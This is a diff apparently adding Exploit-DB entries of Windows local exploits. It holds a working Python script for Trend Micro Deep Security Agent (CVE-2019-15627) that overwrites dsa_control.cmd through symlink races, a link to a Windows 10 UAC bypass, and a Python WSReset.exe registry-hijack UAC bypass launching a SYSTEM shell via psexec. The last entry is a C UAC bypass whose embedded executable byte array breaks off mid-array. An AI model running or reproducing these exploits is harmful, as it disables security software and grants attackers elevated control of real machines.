+#Exploit Date: 2019-12-04
+#Vendor Homepage : http://www.netgate.sk/
+#Link Software : https://www.netgate.sk/download/download.php?id=11
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc ScsiAccess
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: AmitiAvHealth
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Amiti Antivirus Health Check
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\ZwX>sc qc AmitiAvSrv
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: AmitiAvSrv
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Amiti Antivirus Engine Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47751.py b/exploits/windows/local/47751.py
new file mode 100755
index 000000000..a8363b19c
--- /dev/null
+++ b/exploits/windows/local/47751.py
@@ -0,0 +1,106 @@
+# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite
+# Exploit Author : Peter Lapp
+# Exploit Date: 2019-12-05
+# Vendor Homepage :  https://www.trendmicro.com/en_us/business.html
+# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716
+# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.
+# CVE: 2019-15627
+
+# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)
+
+# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )
+# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with abritrary data hosted elsewhere (with limitations)
+# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS, 
+# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired. 
+
+# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.
+# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.
+# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file. 
+# So the attacker can host a "malicious" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage, 
+# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces, 
+# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that 
+# are ripe for the writing that can then point to a malicious binary.
+
+# Usage:
+# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part. 
+# 2. Open a browser (preferrably IE) and start the script
+# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).
+# 4. Keep refreshing the page until you see the script create the target file overwritten.
+#
+# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit. 
+
+
+import time
+import os
+import subprocess
+import sys
+import webbrowser
+from watchdog.observers import Observer
+from watchdog.events import FileSystemEventHandler
+
+class Stage1_Handler(FileSystemEventHandler):
+	def __init__(self):
+		self.filenames = []
+	def on_created(self, event):
+		filename = os.path.basename(event.src_path)
+		if filename in self.filenames:
+			print ('Starting symlink creation.')
+			watcher1.stop()
+			symlinkery(self.filenames)
+		else:
+			self.filenames.append(filename)
+			print ('File %s created.') % filename
+			
+class Stage2_Handler(FileSystemEventHandler):
+	def on_any_event(self, event):
+		if os.path.basename(event.src_path) == 'dsa_control.cmd':
+			print "Target file overwritten/deleted. Cleaning up."
+			subprocess.Popen("taskkill /F /T /IM CreateSymlink.exe", shell=True)
+			subprocess.Popen("taskkill /F /T /IM Baitandswitch.exe", shell=True)
+			os.system('rmdir /S /Q "C:\\ProgramData\\Trend Micro\\AMSP\\temp\\"')
+			os.system('rmdir /S /Q "C:\\test"')
+			os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig','C:\\ProgramData\\Trend Micro\\AMSP\\temp')
+			watcher2.stop()
+			sys.exit(0)
+			
+class Watcher(object):
+	def __init__(self, event_handler, path_to_watch):
+		self.event_handler = event_handler
+		self.path_to_watch = path_to_watch
+		self.observer = Observer()
+	def run(self):
+		self.observer.schedule(self.event_handler(), self.path_to_watch)
+		self.observer.start()
+		try:
+			while True:
+				time.sleep(1)
+		except KeyboardInterrupt:
+			self.observer.stop()
+
+		self.observer.join()
+	def stop(self):
+		self.observer.stop()
+		
+def symlinkery(filenames):
+	print "Enter symlinkery"
+	for filename in filenames:
+		print "Creating symlink for %s" % filename
+		cmdname = "start cmd /c CreateSymlink.exe \"C:\\test\\virus\\%s\" \"C:\\test\\test\\symtarget\"" % filename
+		subprocess.Popen(cmdname, shell=True)
+	os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp','C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig')
+	os.system('mklink /J "C:\\ProgramData\\Trend Micro\\AMSP\\temp" C:\\test')
+	watcher2.run()
+	print "Watcher 2 started"
+
+try:
+        os.mkdir('C:\\test')
+except:
+        pass
+
+path1 = 'C:\\ProgramData\\Trend Micro\\AMSP\\temp\\virus'
+path2 = 'C:\\Program Files\\Trend Micro\\Deep Security Agent\\'
+watcher1 = Watcher(Stage1_Handler,path1)
+watcher2 = Watcher(Stage2_Handler,path2)
+switcheroo = "start cmd /c BaitAndSwitch.exe C:\\test\\test\\symtarget \"C:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa_control.cmd\" \"C:\\windows\\temp\\deleteme.txt\" d"
+subprocess.Popen(switcheroo, shell=True)
+watcher1.run()
\ No newline at end of file
diff --git a/exploits/windows/local/47753.md b/exploits/windows/local/47753.md
new file mode 100644
index 000000000..0ff691f21
--- /dev/null
+++ b/exploits/windows/local/47753.md
@@ -0,0 +1,4 @@
+Windows 10 UAC bypass for all executable files which are autoelevate true. 
+https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47753.zip
\ No newline at end of file
diff --git a/exploits/windows/local/47754.py b/exploits/windows/local/47754.py
new file mode 100755
index 000000000..953498f42
--- /dev/null
+++ b/exploits/windows/local/47754.py
@@ -0,0 +1,63 @@
+#### Fileless UAC bypass (WSReset.exe)
+#### @404death
+#### base on : https://www.activecyber.us/activelabs/windows-uac-bypass
+#
+## EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47754.zip
+#
+import sys, os
+from ctypes import *
+import _winreg
+CMD                   = r"C:\Windows\System32\cmd.exe"
+WS_RESET              = r'C:\Windows\System32\wsreset.exe'
+#PYTHON_CMD           = "python"
+test_cmd              = " -i -s cmd.exe"
+SYSTEM_SHELL          = "psexec.exe"  # to get nt\system   
+REG_PATH              = 'Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command'
+DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
+def is_running_as_admin():
+    '''
+    Checks if the script is running with administrative privileges.
+    Returns True if is running as admin, False otherwise.
+    '''    
+    try:
+        return ctypes.windll.shell32.IsUserAnAdmin()
+    except:
+        return False
+def create_reg_key(key, value):
+    '''
+    Creates a reg key
+    '''
+    try:        
+        _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, REG_PATH)
+        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0, _winreg.KEY_WRITE)                
+        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)        
+        _winreg.CloseKey(registry_key)
+    except WindowsError:        
+        raise
+def bypass_uac(cmd):
+    '''
+    Tries to bypass the UAC
+    '''
+    try:
+        create_reg_key(DELEGATE_EXEC_REG_KEY, '')
+        create_reg_key(None, cmd)    
+    except WindowsError:
+        raise
+def execute():        
+    if not is_running_as_admin():
+        print '[!] Fileless UAC Bypass via Windows Store by @404death '
+        print '[+] Trying to bypass the UAC'
+        print '[+] Waiting to get SYSTEM shell !!!'
+        try:                
+            current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + SYSTEM_SHELL
+            cmd = '{} /c {} {}'.format(CMD, current_dir, test_cmd)
+            bypass_uac(cmd)                
+            os.system(WS_RESET)
+            print '[+] Pwnedd !!! you g0t system shell !!!'                
+            sys.exit(0)                
+        except WindowsError:
+            sys.exit(1)
+    else:
+        print '[+] xailay !!!'        
+if __name__ == '__main__':
+    execute()
\ No newline at end of file
diff --git a/exploits/windows/local/47755.c b/exploits/windows/local/47755.c
new file mode 100644
index 000000000..1d38a4f70
--- /dev/null
+++ b/exploits/windows/local/47755.c
@@ -0,0 +1,24 @@
+// ref : https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
+#include<stdio.h>
+// uac bypass via wsreset.exe
+// @404death
+// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47755.zip
+
+int main()
+
+{
+   printf("\n[+] Run First UAC.bat if immediately stopped !!!!\n\n");
+   printf("[-] Writing shellcode to Inject !!!\n");
+   printf("[-] Wait a few second to get the Admin Shell !!!\n");
+   printf("[-] Trying to Popup pwning MessageBox !!!\n");
+
+   unsigned char bin[] = { 0x4d ,0x5a ,0x90 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x04 ,0x00 ,0x00 ,0x00 ,0xff ,0xff ,0x00 ,0x00 ,0xb8 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x80 ,0x00 ,0x00 ,0x00 ,0x0e ,0x1f ,0xba ,0x0e ,0x00 ,0xb4 ,0x09 ,0xcd ,0x21 ,0xb8 ,0x01 ,0x4c ,0xcd ,0x21 ,0x54 ,0x68 ,0x69 ,0x73 ,0x20 ,0x70 ,0x72 ,0x6f ,0x67 ,0x72 ,0x61 ,0x6d ,0x20 ,0x63 ,0x61 ,0x6e ,0x6e ,0x6f ,0x74 ,0x20 ,0x62 ,0x65 ,0x20 ,0x72 ,0x75 ,0x6e ,0x20 ,0x69 ,0x6e ,0x20 ,0x44 ,0x4f ,0x53 ,0x20 ,0x6d ,0x6f ,0x64 ,0x65 ,0x2e ,0x0d ,0x0d ,0x0a ,0x24 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x50 ,0x45 ,0x00 ,0x00 ,0x64 ,0x86 ,0x11 ,0x00 ,0x07 ,0x9f ,0x5e ,0x5d ,0x00 ,0x6a ,0x00 ,0x00 ,0xb1 ,0x03 ,0x00 ,0x00 ,0xf0 ,0x00 ,0x26 ,0x20 ,0x0b ,0x02 ,0x02 ,0x1e ,0x00 ,0x1c ,0x00 ,0x00 ,0x00 ,0x38 ,0x00 ,0x00 ,0x00 ,0x0a ,0x00 ,0x00 ,0x30 ,0x13 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x04 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x05 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x01 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x4e ,0xec ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0x80 ,0x00 ,0x00 ,0x46 ,0x00 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x20 ,0x06 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x50 ,0x00 ,0x00 ,0x28 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xc0 ,0x00 ,0x00 ,0x64 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa0 ,0x40 ,0x00 ,0x00 ,0x28 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x98 ,0x91 ,0x00 ,0x00 ,0x48 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xf8 ,0x1a ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x1c ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x50 ,0x60 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x80 ,0x00 ,0x00 ,0x00 ,0x00 ,0x30 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x22 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x50 ,0xc0 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x20 ,0x03 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0x04 ,0x00 ,0x00 ,0x00 ,0x24 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x60 ,0x40 ,0x2e ,0x70 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x28 ,0x02 ,0x00 ,0x00 ,0x00 ,0x50 ,0x00 ,0x00 ,0x00 ,0x04 ,0x00 ,0x00 ,0x00 ,0x28 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x30 ,0x40 ,0x2e ,0x78 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0xac ,0x01 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x2c ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x30 ,0x40 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x09 ,0x00 ,0x00 ,0x00 ,0x70 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x80 ,0x00 ,0x60 ,0xc0 ,0x2e ,0x65 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x46 ,0x00 ,0x00 ,0x00 ,0x00 ,0x80 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x2e ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x30 ,0x40 ,0x2e ,0x69 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x20 ,0x06 ,0x00 ,0x00 ,0x00 ,0x90 ,0x00 ,0x00 ,0x00 ,0x08 ,0x00 ,0x00 ,0x00 ,0x30 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x30 ,0xc0 ,0x2e ,0x43 ,0x52 ,0x54 ,0x00 ,0x00 ,0x00 ,0x00 ,0x58 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa0 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x38 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x40 ,0xc0 ,0x2e ,0x74 ,0x6c ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0xb0 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x3a ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x40 ,0xc0 ,0x2e ,0x72 ,0x65 ,0x6c ,0x6f ,0x63 ,0x00 ,0x00 ,0x64 ,0x00 ,0x00 ,0x00 ,0x00 ,0xc0 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x3c ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x30 ,0x42 ,0x2f ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x50 ,0x00 ,0x00 ,0x00 ,0x00 ,0xd0 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x3e ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x50 ,0x42 ,0x2f ,0x31 ,0x39 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x08 ,0x1f ,0x00 ,0x00 ,0x00 ,0xe0 ,0x00 ,0x00 ,0x00 ,0x20 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x10 ,0x42 ,0x2f ,0x33 ,0x31 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x49 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x10 ,0x42 ,0x2f ,0x34 ,0x35 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x22 ,0x02 ,0x00 ,0x00 ,0x00 ,0x10 ,0x01 ,0x00 ,0x00 ,0x04 ,0x00 ,0x00 ,0x00 ,0x62 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x10 ,0x42 ,0x2f ,0x35 ,0x37 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x01 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x66 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x40 ,0x42 ,0x2f ,0x37 ,0x30 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x9b ,0x00 ,0x00 ,0x00 ,0x00 ,0x30 ,0x01 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x00 ,0x10 ,0x42 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0xf9 ,0x5f ,0x00 ,0x00 ,0xe9 ,0xc4 ,0x17 ,0x00 ,0x00 ,0x0f ,0x1f ,0x40 ,0x00 ,0x41 ,0x55 ,0x41 ,0x54 ,0x55 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x28 ,0x85 ,0xd2 ,0x49 ,0x89 ,0xcc ,0x4d ,0x89 ,0xc5 ,0x75 ,0x7a ,0x8b ,0x15 ,0xec ,0x5f ,0x00 ,0x00 ,0x31 ,0xc0 ,0x85 ,0xd2 ,0x7e ,0x59 ,0x83 ,0xea ,0x01 ,0x48 ,0x8b ,0x1d ,0x34 ,0x32 ,0x00 ,0x00 ,0x31 ,0xed ,0xbf ,0x01 ,0x00 ,0x00 ,0x00 ,0x89 ,0x15 ,0xcf ,0x5f ,0x00 ,0x00 ,0x4c ,0x8b ,0x25 ,0xc8 ,0x81 ,0x00 ,0x00 ,0xeb ,0x08 ,0xb9 ,0xe8 ,0x03 ,0x00 ,0x00 ,0x41 ,0xff ,0xd4 ,0x48 ,0x89 ,0xe8 ,0xf0 ,0x48 ,0x0f ,0xb1 ,0x3b ,0x48 ,0x85 ,0xc0 ,0x48 ,0x89 ,0xc6 ,0x75 ,0xe8 ,0x48 ,0x8b ,0x3d ,0x0f ,0x32 ,0x00 ,0x00 ,0x8b ,0x07 ,0x83 ,0xf8 ,0x02 ,0x0f ,0x84 ,0xe9 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x1f ,0x00 ,0x00 ,0x00 